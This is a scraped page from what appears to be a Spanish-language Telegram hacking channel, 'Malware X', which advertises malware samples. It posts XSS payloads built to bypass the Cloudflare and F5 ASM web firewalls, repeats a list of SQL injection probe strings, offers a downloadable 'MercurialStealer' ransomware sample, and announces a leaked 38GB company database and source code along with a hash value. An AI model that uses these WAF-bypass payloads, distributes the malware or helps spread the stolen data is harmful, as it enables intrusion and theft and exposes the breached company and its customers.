Malware X
198 subscribers
412 photos
22 videos
196 files
462 links
The largest collection of malware source code, samples, and papers on the internet.

98,000,000 of all kind of Virus.

Hosted by Pr@fEsOr X
Download Telegram
Forwarded from Deleted Account
How I bypass 403 cloudflare HTML injection to XSS ... 30 min test to bypass it

bypass final payload

<h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE

Share payload by @_Y000_
thanks
Forwarded from Deleted Account
Forwarded from Deleted Account
**> Sabian que en en la CVE del año 1999 hubo CVE-1999-1598 vulnerabiliades registradas y la ultima vulnerabilidad registrada fue:

-----------------------------------------
NT Domain DoS and Security Exploit with SAMBA Server
___________________________

**> En el año 2021 hubo 46109 +- y la utlima vulnerbilidad registrada de ese año fue:

--------------------------------
Invalid input sanitizing leads to reflected Cross Site Scripting (XSS) in ASUS RT-AC52U_B1 3.0.0.4.380.10931 can lead to a user session hijack.
-------------------------------
Forwarded from Deleted Account
**> En el año 2020 hubo 9999 vulnerabilidades registradas y la ultima fue:

---------------------------------
A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iTunes for Windows 12.10.9. Processing a maliciously crafted text file may lead to arbitrary code execution.
---------------------------------

Si se dan cuenta entre el 2020 y 2021 hubo un aumento del casi 400% en vulnerabilidades.....

woooowwww y vamos por mas......
CUÁNTOS HABRÁ ESTE 2022?
Bug Bounty Tips
****
Estos tips no son aptos para los que sienten que con el hacking apagan el infierno a soplidos.

Pero ahí les van algunos tips que se usan para encontrar facilmente sql-Injection 100%
°°°°°°°°°°°
°°°°°°°°°°°°
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()

#x25hackingnews #sqli #profesorx
Forwarded from Deleted Account
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Deleted Account
This media is not supported in your browser
VIEW IN TELEGRAM
Bug Bounty Tips
****
Estos tips no son aptos para los que sienten que con el hacking apagan el infierno a soplidos.

Pero ahí les van algunos tips que se usan para encontrar facilmente sql-Injection 100%
°°°°°°°°°°°°°°°°°°°°°°°
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=")
/?q=')
/?q=-x()

#x25hackingnews #sqli #profesorx
Forwarded from Deleted Account
Tipos de payloads SQLI
***
1.- Boolean
-based blind
2.- Error-based
3.- Union query-based
4.- Stacked queries
5.- Time-based blind
6.- Inline queries
******
Boolean-based blind
´´´
´´´´´´´´´´´´´´´´´´´´´´´´´´
Significa que la vulnerabilidad se basa en valores booleanos (true or false) y se dice que es ciega por que no muetra alguna señal de que hay un error en la página.

Error-based
¨¨¨¨¨¨¨¨¨¨¨¨
Error-based significa que la inyeccion se basa en los mensajes de error que el servidor responde y asi conocer un poco mas sobre la estructura de la base de datos que se esta usando.¨

Union query-based
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Union query-based significa que estamos aprovechando que el operador UNION de sql puede ser usado, gracias a esto podemos combinar declaraciones que serán visualizadas como parte de la respuesta del servidor.

Inline queries
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
Inline queries consiste en unir una query sql dentro de otra y asi sucesivamente para ver si la sentencia es ejecutada.

#x25hackingnews
Forwarded from Deleted Account
Sabían amigos que en la Common Vulnerabilities and Exposures CVE
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Desde el inicio de año ya tienen reservados números CVE de registro para las empresas y que los usarán en el caso que se encuentre una vulnerabilidad de sus sistemas?

👉Este año tienen reservados + - 2816 registros

y que los identifican con números consecutivos de registros avanzados como el siguiente:
+++++++++++++++
👇👇👇👇👇👇👇

CVE-2022-23561 RESERVADO Este candidato ha sido reservado por una organización o individuo que lo utilizará cuando anuncie un nuevo problema de seguridad. Cuando se haya dado a conocer el candidato, se proporcionarán los detalles de este candidato.
++++++++++++++++

#CVE
Forwarded from Deleted Account
cheat sheet que contiene consultas avanzadas para inyección SQL de todo tipo.
👇👇👇👇👇👇👇👇
MercurialStealer.7z
911.5 KB
MercurialStealer Ransomware - Sample 👍
Forwarded from Deleted Account
Un payload XSS que permite saltarnos F5 ASM.

@str0d

str0d"/><style>

@KeyframeS

x{}</style><str style="animation-name:x;" onanimationend="alert.bind()(22)"></str>
°°°°°°°°°°°°°°°°°°
👍 #x25hackingnews #xss #hacking
Un desensamblador de código de bytes de Python que ayuda a los ingenieros inversos a diseccionar binarios de Python al desensamblar y analizar los archivos de código de bytes (.pyc) de Python compilados en todas las versiones de Python (incluida Python 3.10.*)
👇👇👇👇👇👇👇👇👇
Forwarded from Deleted Account
Este sitio ah sido hackeado y puesta en internet su base de datos y código fuente
+((++++++++
ABFRL DB + Source code & Invoice (PAN)
++++++++++

Si quieres conocer más a cerca de ADITYA
👇
Source: https://www.abfrl.com/about/

Wikipedia:
--------------- https://en.wikipedia.org/wiki/Aditya_Birla_Fashion_and_Retail

DB | size - 38GB

MD5-Salt: S8wcfPqfN2HTmMCG1O0f5LDGN1XnfYqvuGTYZE2FR0qkT1LKmvuuHc1R

S#LEAK 👍